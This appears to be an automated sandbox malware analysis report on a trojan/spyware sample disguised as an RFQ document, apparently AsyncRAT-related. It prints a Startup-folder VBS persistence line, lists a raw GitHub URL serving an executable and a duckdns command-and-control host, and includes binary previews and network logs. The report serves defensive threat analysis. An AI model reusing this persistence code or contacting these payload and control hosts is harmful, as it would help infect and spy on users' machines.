                                    https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeInstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.1784098344.0000000002B93000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://github.com/mgravell/protobuf-netRFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1479819783.0000000006570000.00000004.08000000.00040000.00000000.sdmpfalse
                                        		high
                                        https://www.chirreeirl.comRFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003011000.00000004.00000800.00020000.00000000.sdmp, AuditFlags.exe, 00000005.00000002.1622157833.0000000002921000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ-12202430_ACD_Group.pif.exe, 00000000.00000002.1465657155.0000000003011000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3871748877.0000000002965000.00000004.00000800.00020000.00000000.sdmp, AuditFlags.exe, 00000005.00000002.1622157833.0000000002921000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          209.58.149.225
                                          		chirreeirl.comUnited States
                                          		394380LEASEWEB-USA-DAL-10USfalse
                                          193.187.91.218
                                          		pureeratee.duckdns.orgSweden
                                          		197595OBE-EUROPEObenetworkEuropeSEtrue

                                          General Information

                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1586919
                                          Start date and time:2025-01-09 19:01:08 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 47s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:10
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:RFQ-12202430_ACD_Group.pif.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winEXE@8/6@2/2
                                          EGA Information:
                                          • Successful, ratio: 50%
                                          HCA Information:
                                          • Successful, ratio: 86%
                                          • Number of executed functions: 407
                                          • Number of non-executed functions: 26
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 2.22.50.144, 2.22.50.131, 20.12.23.50
                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                          • Execution Graph export aborted for target InstallUtil.exe, PID 7676 because it is empty
                                          • Execution Graph export aborted for target InstallUtil.exe, PID 8072 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: RFQ-12202430_ACD_Group.pif.exe

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          13:02:18API Interceptor10936891x Sleep call for process: InstallUtil.exe modified
                                          19:02:14AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          209.58.149.225PO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                            RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                              RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                https://contract-kitchensbywoodys16713653.brizy.site/Get hashmaliciousUnknownBrowse
                                                  193.187.91.218PO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                    RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                      RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        pureeratee.duckdns.orgPO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        LEASEWEB-USA-DAL-10USPO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.149.225
                                                        https://ccml.io/Get hashmaliciousUnknownBrowse
                                                        • 172.241.26.5
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.149.225
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.149.225
                                                        xd.mpsl.elfGet hashmaliciousMiraiBrowse
                                                        • 172.241.229.61
                                                        Payload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.145.210
                                                        JHPvqMzKbz.exeGet hashmaliciousVidarBrowse
                                                        • 172.241.51.69
                                                        arm7.elfGet hashmaliciousUnknownBrowse
                                                        • 172.241.27.111
                                                        https://bitfinexinvestment.com/Get hashmaliciousUnknownBrowse
                                                        • 209.58.153.106
                                                        http://www.web3walletsync.com/Get hashmaliciousUnknownBrowse
                                                        • 209.58.146.114
                                                        OBE-EUROPEObenetworkEuropeSEPO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        G6hxXf90i5.exeGet hashmaliciousUnknownBrowse
                                                        • 185.157.162.103
                                                        G6hxXf90i5.exeGet hashmaliciousUnknownBrowse
                                                        • 185.157.162.103
                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                        • 185.157.162.216
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        RFQ-12202431_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 193.187.91.218
                                                        ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                                                        • 185.157.162.216
                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                        • 185.157.162.216
                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                        • 185.157.162.216
                                                        file.exeGet hashmaliciousXmrigBrowse
                                                        • 185.157.162.216

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0efiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 209.58.149.225
                                                        PO-12202432_ACD_Group.pif.exeGet hashmaliciousUnknownBrowse
                                                        • 209.58.149.225
                                                        Nuevo pedido.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                        • 209.58.149.225
                                                        Copy shipping docs PO EV1786 LY ECO PAK EV1.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                        • 209.58.149.225
                                                        http://cipassoitalia.itGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                        • 209.58.149.225
                                                        JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                        • 209.58.149.225
                                                        bc7EKCf.exeGet hashmaliciousStormKittyBrowse
                                                        • 209.58.149.225
                                                        s7.mp4.htaGet hashmaliciousLummaCBrowse
                                                        • 209.58.149.225
                                                        chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                        • 209.58.149.225

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                        Category:dropped
                                                        Size (bytes):71954
                                                        Entropy (8bit):7.996617769952133
                                                        Encrypted:true
                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):328
                                                        Entropy (8bit):3.1257939159640658
                                                        Encrypted:false
                                                        SSDEEP:6:kK2L9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DDnLNkPlE99SNxAhUe/3
                                                        MD5:769418AD815ABC544A65C1763BBE27D0
                                                        SHA1:3303743478AD4DE3824E9147FAD66831A68CD233
                                                        SHA-256:613E52AB0D95F22102DA8439D837AED96257093FB371941ADA29BBEF8FE513E6
                                                        SHA-512:C5233811B5068DAEA0B199728AD75A8C9882463C922FC6DB075C5D48C41318904693C5D91CF53E92E50FE0FF8FA3A3EF6567771AB8237C12EBFFC16A86C42C4A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:p...... ..........m..b..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

                                                        Download File
                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):621
                                                        Entropy (8bit):5.345265452111628
                                                        Encrypted:false
                                                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhayoDLI4MWuPrePEniv:ML9E4KlKDE4KhKiKhRAE4KzeR
                                                        MD5:9A0010B54E25DD22EC1D9FA3EA1AE6C2
                                                        SHA1:830D8D4D0BD0544B1F25ECF4303C40479CF677C0
                                                        SHA-256:B3D9F4BEFE0FF83AEC0AA7CCFB542E0B9CED36756FBA1BA863606969F3360F56
                                                        SHA-512:6DEBC5BFC689C19AD8B72264FDD3710C93A2C2E5344E8024502B2D3E7554BC80381CE2A7BB4D560EB8F3E5E0C73195D07839651FE8CEA6E27F9A2674ABFF6691
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                        C:\Users\user\AppData\Roaming\AuditFlags.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.471293934093233
                                                        Encrypted:false
                                                        SSDEEP:384:sBMXirhFUInJ2K6h57y0btkMiVFl/ryGzrV7BjIH9rgT1vMnxsAmYjzww6HFawW:sBMX83nJ200ZbQ/ryirV1QlC/bH0t
                                                        MD5:A451E1EAD24BD11248F2365A292FB822
                                                        SHA1:7A9916112C6EF5EB1647127E47A55338DF1737E6
                                                        SHA-256:A41BF7D87976ADC297AA44703F31EAB78BE9C3AC80C0D10D621C603B68963C36
                                                        SHA-512:CE8B6B2DD116E0345ECD8478832910C48429148C0328F257ADC3D1503FD204CB8BF938B070BDD77566BD67FD6C7C5ADCE08886772F0ECD62436E5936162113A5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 61%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg.................V...........t... ........@.. ....................................`..................................t..K.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B.................t......H........:..|:............................................................(....*.(....&*Fs....%(....o....*.s ...%(!...(.....o"...o#...o$...*.s,...%(.....o-...r...po....o/...*.s,...%.7...(0...(.....o1...u6...r...p(2...(...+o4...o/...*..{5...*..{6...*V.(......}5.....}6...*. `..# )UU.Z(7....{5...o;...X )UU.Z(9....{6...o<...X*2.ro..p(?...*"..(?...*&...(@...*&...(A...*"..(....*"..(....*"..(....*"..(....*"..(....*"..(....*f.{.... ....?.....*.{....*:..{....o>...X*:..{....o>...Y*N.{.

                                                        C:\Users\user\AppData\Roaming\AuditFlags.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AuditFlags.vbs

                                                        Download File
                                                        Process:C:\Users\user\Desktop\RFQ-12202430_ACD_Group.pif.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):86
                                                        Entropy (8bit):4.78372544114185
                                                        Encrypted:false
                                                        SSDEEP:3:FER/n0eFHHoCHyg4EaKC5EDAnHn:FER/lFHICHhJaZ5EDO
                                                        MD5:5D1D53E9238F09D61EE383B5E4F6FDC4
                                                        SHA1:A85AE90B9DD85DB2F16075F3C93061CCEBA20ACC
                                                        SHA-256:7456CBA1300E4388848127F706E62B7DB125F0A93D3269CBA84659B11615D95B
                                                        SHA-512:AD5B975952CED46A31D19D9D76F68A529BF994FFB1720FC664A2CDA97216472635AEF0BB7A90FFEFD83737E2B5470A65249B6B39E9591E61A83128EC653E0CAD
                                                        Malicious:true
                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\AuditFlags.exe"""

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):5.471293934093233
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        File name:RFQ-12202430_ACD_Group.pif.exe
                                                        File size:24'576 bytes
                                                        MD5:a451e1ead24bd11248f2365a292fb822
                                                        SHA1:7a9916112c6ef5eb1647127e47a55338df1737e6
                                                        SHA256:a41bf7d87976adc297aa44703f31eab78be9c3ac80c0d10d621c603b68963c36
                                                        SHA512:ce8b6b2dd116e0345ecd8478832910c48429148c0328f257adc3d1503fd204cb8bf938b070bdd77566bd67fd6c7c5adce08886772f0ecd62436e5936162113a5
                                                        SSDEEP:384:sBMXirhFUInJ2K6h57y0btkMiVFl/ryGzrV7BjIH9rgT1vMnxsAmYjzww6HFawW:sBMX83nJ200ZbQ/ryirV1QlC/bH0t
                                                        TLSH:31B22A04ABED8237DBFD6B7558F2419017F2AB967463EB9E4C8830E21C47B541A92337
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....qg.................V...........t... ........@.. ....................................`................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4074de
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x6771E4DD [Mon Dec 30 00:10:05 2024 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74900x4b.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x5b6.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000x54e40x5600fb11cbcb097b69319ead49ba46bdc6d7False0.4870094476744186data5.659087124502073IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc0x80000x5b60x60018ee7806047c851a0a218f5ab33f3d4bFalse0.416015625data4.0689339307184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xa0000xc0x2004f3b604fe01bcf5f90daa2bb84881945False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x80a00x32cdata0.4211822660098522
                                                        RT_MANIFEST0x83cc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2025-01-09T19:02:18.154052+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1193.187.91.21850787192.168.2.849707TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 9, 2025 19:02:07.611566067 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:07.611620903 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:07.612200022 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:07.627337933 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:07.627362013 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.231739998 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.231856108 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.265209913 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.265240908 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.265609980 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.319902897 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.571527958 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.615334988 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.753499031 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.753556967 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.753577948 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.753597021 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.753609896 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.753622055 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.753633022 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.753654003 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.801978111 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.802187920 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.802196980 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.843583107 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.843594074 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.843620062 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.843627930 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.843647003 CET44349706209.58.149.225192.168.2.8
                                                        Jan 9, 2025 19:02:08.843696117 CET49706443192.168.2.8209.58.149.225
                                                        Jan 9, 2025 19:02:08.844783068 CET44349706209.58.149.225192.168.2.8
